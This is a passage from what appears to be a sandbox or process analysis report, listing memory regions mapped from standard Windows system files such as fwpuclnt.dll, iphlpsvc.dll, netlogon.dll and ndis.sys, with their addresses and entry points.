"\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3875 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3876 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3877 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3878 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3879 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3880 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3881 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3882 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3883 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3884 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3885 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3886 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3887 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3888 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3889 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3890 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3891 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3892 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3893 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3894 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3895 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3896 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3897 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3898 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3899 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3900 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3901 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3902 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3903 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3904 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3905 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3906 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3907 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3908 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3909 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3910 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3911 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3912 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3913 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3914 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3915 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3916 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3917 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3918 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3919 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3920 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3921 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3922 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3923 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3924 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3925 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3926 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3927 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3928 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3929 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3930 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3931 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3932 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3933 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3934 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3935 start_va = 0xd70000 end_va = 0xd97fff monitored = 0 entry_point = 0xd71860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 3936 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") Region: id = 3937 start_va = 0xd70000 end_va = 0xd97fff monitored = 0 entry_point = 0xd71860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 3938 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") Region: id = 3939 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3940 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3941 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3942 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3943 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3944 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3945 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3946 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3947 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3948 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3949 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3950 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3951 start_va = 0x120000 end_va = 0x12dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3952 start_va = 0x130000 end_va = 0x13dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3953 start_va = 0x120000 end_va = 0x12dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3954 start_va = 0x130000 end_va = 0x13dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3955 start_va = 0x13f0000 end_va = 0x21e4fff monitored = 0 entry_point = 0x14d3268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 3956 start_va = 0x13f0000 end_va = 0x21e4fff monitored = 0 entry_point = 0x14d3268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 3957 start_va = 0x13f0000 end_va = 0x1499fff monitored = 0 entry_point = 0x1404100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 3958 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 3959 start_va = 0x13f0000 end_va = 0x1499fff monitored = 0 entry_point = 0x1404100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 3960 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 3961 start_va = 0xe30000 end_va = 0xe77fff monitored = 0 entry_point = 0xe6fd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 3962 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 3963 start_va = 0xe30000 end_va = 0xe77fff monitored = 0 entry_point = 0xe6fd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 3964 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 3965 start_va = 0x13f0000 end_va = 0x14d8fff monitored = 0 entry_point = 0x14c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3966 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3967 start_va = 0x13f0000 end_va = 0x14d8fff monitored = 0 entry_point = 0x14c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3968 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3969 start_va = 0x13f0000 end_va = 0x14d8fff monitored = 0 entry_point = 0x14c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3970 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3971 start_va = 0x13f0000 end_va = 0x14d8fff monitored = 0 entry_point = 0x14c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3972 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3973 start_va = 0x13f0000 end_va = 0x153cfff monitored = 0 entry_point = 0x14f2a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 3974 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 3975 start_va = 0x13f0000 end_va = 0x153cfff monitored = 0 entry_point = 0x14f2a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 3976 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 3977 start_va = 0x120000 end_va = 0x12efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 3978 start_va = 0xe30000 end_va = 0xe89fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 3979 start_va = 0x120000 end_va = 0x12efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 3980 start_va = 0xe30000 end_va = 0xe89fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 3981 start_va = 0x120000 end_va = 0x12ffff monitored = 0 entry_point = 0x12a33c region_type = mapped_file name = "tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: 